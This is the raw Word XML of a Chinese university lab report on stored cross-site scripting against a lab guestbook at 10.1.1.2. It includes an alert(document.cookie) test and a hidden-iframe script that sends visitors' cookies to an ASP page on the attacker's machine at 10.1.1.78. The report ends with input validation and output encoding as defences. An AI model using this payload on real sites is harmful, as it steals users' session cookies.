      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>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结果如图所示：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2、继续添加留言，包含以下内容：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>      &lt;script&gt;alert(document.cookie)&lt;/script&gt;，比较有什么区别？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3、使用管理员登录，观察显示的cookie有什么不同？</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6762750" cy="4505325"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6762750" cy="450532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4、思考：这种窃取cookie的方式有什么缺点？有什么方法可以将用户的cookie窃取出并保存下来，而且用户看不到？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5、在攻击机上使用提供的页面搭建WEB服务器，以便进一步保存浏览用户的cookie。</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5467350" cy="1847850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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7"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5467350" cy="1847850"/>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6153150" cy="3609975"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="10"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8"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6153150" cy="360997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搭建IIS服务器过程中应注意如下几点：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1）在Web服务扩展中允许Active Server Pages服务</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6229350" cy="3019425"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="8"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9"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6229350" cy="301942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2）默认网站-属性-文档中添加index.asp内容页。</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6143625" cy="3105150"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="13"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0"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6143625" cy="3105150"/>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3）在：C:\tools\跨站脚本攻击\中的cookies文件夹属性-安全-组或用户名称（G）-添加-高级-立即查找中找到IUSR_BJHIT-YXI7NEFU8用户，选择并确定</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7696200" cy="4267200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11"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1"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7696200" cy="4267200"/>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4)给IUSR_BJHIT-YXI7NEFU8用户写入权限</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7505700" cy="4010025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="6"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2"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7505700" cy="401002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搭建好服务器后，在浏览器中输入本机IP地址进行测试，如下图所示，表示web服务正常进行。</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4581525" cy="1838325"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="12"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3"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4581525" cy="183832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返回http://10.1.1.2页面，继续添加留言，包含以下内容：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>      &lt;script&gt;document.write("&lt;iframe width=0 height=0 src='http://10.1.1.78/cookie.asp?cookie="+document.cookie+"'&gt;&lt;/iframe&gt;");&lt;/script&gt;</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5314950" cy="3362325"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="5"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4"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5314950" cy="336232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提交留言后观察目标服务器页面，没有看到异常现象，如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5314950" cy="2114550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="图片 1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5"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5314950" cy="2114550"/>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再打开本地页面，查看接收浏览用户的cookie接收情况：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6334125" cy="1247775"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="7" name="图片 1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66"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6334125" cy="1247775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>      可以看到，已经接收到用户的cookie了，这些cookie包含了所有浏览该页面的信息，如果是登录用户的话，cookie包含了用户的用户名与密码信息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:leftChars="0" w:right="0" w:rightChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:leftChars="0" w:right="0" w:rightChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>五</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>、实验结果总结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通过本次实验我了解了到跨站脚本基本原理是：用户提交的变量没有经过完整过滤Html字符或者根本就没有经过过滤就放到了数据库中，一个用户提交的Html代码被其他浏览该网站的用户访问，通过这些Html代码也就间接控制了浏览者的浏览器，从网站开发者的角度看应做到如下几点，以防止任何已成功注入的脚本在浏览器端运行，输入验证，输出编码，注意黑名单验证方式的局限性，警惕规范化错误。</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId8" w:type="default"/>
      <w:footerReference r:id="rId9"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5</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="10"/>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1726" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="8416" w:y="1"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rStyle w:val="10"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="10"/>
        <w:rFonts w:hint="eastAsia"/>
        <w:kern w:val="0"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:t xml:space="preserve">第 </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="10"/>
        <w:kern w:val="0"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="10"/>
        <w:kern w:val="0"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="10"/>
        <w:kern w:val="0"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="10"/>
        <w:kern w:val="0"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="10"/>
        <w:kern w:val="0"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="10"/>
        <w:rFonts w:hint="eastAsia"/>
        <w:kern w:val="0"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:t xml:space="preserve"> 页 共 </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="10"/>
        <w:kern w:val="0"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="10"/>
        <w:kern w:val="0"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> NUMPAGES </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="10"/>
        <w:kern w:val="0"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="10"/>
        <w:kern w:val="0"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:t>5</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="10"/>
        <w:kern w:val="0"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="10"/>
        <w:rFonts w:hint="eastAsia"/>
        <w:kern w:val="0"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:t xml:space="preserve"> 页</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四川大学工商管理学院实验教学大纲</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实验报告书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673A73"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E7673A73"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="2B0E7ED1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2B0E7ED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12B2C"/>
    <w:rsid w:val="000119AA"/>
    <w:rsid w:val="00016FAD"/>
    <w:rsid w:val="000207C4"/>
    <w:rsid w:val="00021A2A"/>
    <w:rsid w:val="0008507B"/>
    <w:rsid w:val="00096777"/>
    <w:rsid w:val="000B7210"/>
    <w:rsid w:val="000E291D"/>
    <w:rsid w:val="000E3246"/>
    <w:rsid w:val="00142CF6"/>
    <w:rsid w:val="00175C06"/>
    <w:rsid w:val="00183ADD"/>
    <w:rsid w:val="00186FC2"/>
    <w:rsid w:val="001D42BD"/>
    <w:rsid w:val="0025536E"/>
    <w:rsid w:val="002614EF"/>
    <w:rsid w:val="00286D51"/>
    <w:rsid w:val="002F0159"/>
    <w:rsid w:val="00336C21"/>
    <w:rsid w:val="0034452B"/>
    <w:rsid w:val="00354613"/>
    <w:rsid w:val="0035607C"/>
    <w:rsid w:val="00357272"/>
    <w:rsid w:val="00391815"/>
    <w:rsid w:val="00392A5D"/>
    <w:rsid w:val="00393425"/>
    <w:rsid w:val="003A75D8"/>
    <w:rsid w:val="003C0833"/>
    <w:rsid w:val="003C507E"/>
    <w:rsid w:val="003C772F"/>
    <w:rsid w:val="003E3D61"/>
    <w:rsid w:val="003F56C1"/>
    <w:rsid w:val="004176F7"/>
    <w:rsid w:val="00424BA5"/>
    <w:rsid w:val="00444717"/>
    <w:rsid w:val="00461C4C"/>
    <w:rsid w:val="004A3F15"/>
    <w:rsid w:val="004E306E"/>
    <w:rsid w:val="004E4143"/>
    <w:rsid w:val="0050768B"/>
    <w:rsid w:val="0051062B"/>
    <w:rsid w:val="0052146B"/>
    <w:rsid w:val="0055701E"/>
    <w:rsid w:val="00570C24"/>
    <w:rsid w:val="00591A04"/>
    <w:rsid w:val="005B7568"/>
    <w:rsid w:val="005C57E1"/>
    <w:rsid w:val="005D148F"/>
    <w:rsid w:val="00634E2E"/>
    <w:rsid w:val="006C1623"/>
    <w:rsid w:val="006D3268"/>
    <w:rsid w:val="006E7B53"/>
    <w:rsid w:val="00705C83"/>
    <w:rsid w:val="00747543"/>
    <w:rsid w:val="00763CCD"/>
    <w:rsid w:val="0076649A"/>
    <w:rsid w:val="007B4D55"/>
    <w:rsid w:val="007B5D9F"/>
    <w:rsid w:val="00841675"/>
    <w:rsid w:val="0085068E"/>
    <w:rsid w:val="00854AC5"/>
    <w:rsid w:val="0085630E"/>
    <w:rsid w:val="00875316"/>
    <w:rsid w:val="00880262"/>
    <w:rsid w:val="00882A93"/>
    <w:rsid w:val="008E5332"/>
    <w:rsid w:val="008F7181"/>
    <w:rsid w:val="00901053"/>
    <w:rsid w:val="00940AF4"/>
    <w:rsid w:val="00945D8A"/>
    <w:rsid w:val="009A595C"/>
    <w:rsid w:val="009C1ADF"/>
    <w:rsid w:val="009E431A"/>
    <w:rsid w:val="00A574BD"/>
    <w:rsid w:val="00A91E27"/>
    <w:rsid w:val="00A92278"/>
    <w:rsid w:val="00B25797"/>
    <w:rsid w:val="00B42E27"/>
    <w:rsid w:val="00B63546"/>
    <w:rsid w:val="00B652BA"/>
    <w:rsid w:val="00B90744"/>
    <w:rsid w:val="00B926E7"/>
    <w:rsid w:val="00B9691C"/>
    <w:rsid w:val="00BB690A"/>
    <w:rsid w:val="00C1056C"/>
    <w:rsid w:val="00C12B2C"/>
    <w:rsid w:val="00C169CA"/>
    <w:rsid w:val="00C2692A"/>
    <w:rsid w:val="00C60FD2"/>
    <w:rsid w:val="00C61CFB"/>
    <w:rsid w:val="00C77788"/>
    <w:rsid w:val="00C85761"/>
    <w:rsid w:val="00CA2824"/>
    <w:rsid w:val="00CA638F"/>
    <w:rsid w:val="00CE5154"/>
    <w:rsid w:val="00D13A82"/>
    <w:rsid w:val="00D45028"/>
    <w:rsid w:val="00D5208F"/>
    <w:rsid w:val="00D75294"/>
    <w:rsid w:val="00D82C33"/>
    <w:rsid w:val="00D84BA2"/>
    <w:rsid w:val="00D86585"/>
    <w:rsid w:val="00DE4FFC"/>
    <w:rsid w:val="00DE60FD"/>
    <w:rsid w:val="00DE7A95"/>
    <w:rsid w:val="00E02710"/>
    <w:rsid w:val="00E10431"/>
    <w:rsid w:val="00E24407"/>
    <w:rsid w:val="00E2556A"/>
    <w:rsid w:val="00E55F64"/>
    <w:rsid w:val="00E62F2D"/>
    <w:rsid w:val="00E70CCE"/>
    <w:rsid w:val="00E960CD"/>
    <w:rsid w:val="00E96D4D"/>
    <w:rsid w:val="00EC18CF"/>
    <w:rsid w:val="00EE4DD3"/>
    <w:rsid w:val="00EF5FA1"/>
    <w:rsid w:val="00F3721D"/>
    <w:rsid w:val="00F873E0"/>
    <w:rsid w:val="00F96613"/>
    <w:rsid w:val="00FA045B"/>
    <w:rsid w:val="00FC1C02"/>
    <w:rsid w:val="00FC3B91"/>
    <w:rsid w:val="00FE2A9D"/>
    <w:rsid w:val="00FE2C68"/>
    <w:rsid w:val="2CB7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ocument Map"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="14"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="Body Text Indent"/>
    <w:basedOn w:val="1"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:left="1436" w:leftChars="684"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="32"/>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qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:pageBreakBefore/>
      <w:widowControl/>
      <w:spacing w:before="60" w:after="60"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体" w:cs="Arial"/>
      <w:bCs/>
      <w:sz w:val="30"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="9">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="10">
    <w:name w:val="page number"/>
    <w:basedOn w:val="8"/>
    <w:uiPriority w:val="0"/>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中文首行缩进"/>
    <w:basedOn w:val="1"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:ind w:firstLine="495"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="14">
    <w:name w:val="文档结构图 Char"/>
    <w:basedOn w:val="8"/>
    <w:link w:val="2"/>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60"/>
    <customShpInfo spid="_x0000_s2057"/>
    <customShpInfo spid="_x0000_s2064"/>
    <customShpInfo spid="_x0000_s2062"/>
    <customShpInfo spid="_x0000_s2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109</Words>
  <Characters>625</Characters>
  <Lines>5</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>108</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>733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2013-04-13T06:46:00Z</dcterms:created>
  <dc:creator>戈鹏</dc:creator>
  <cp:lastModifiedBy>Баыан мокэ</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-06-08T12:32:57Z</dcterms:modified>
  <dc:title>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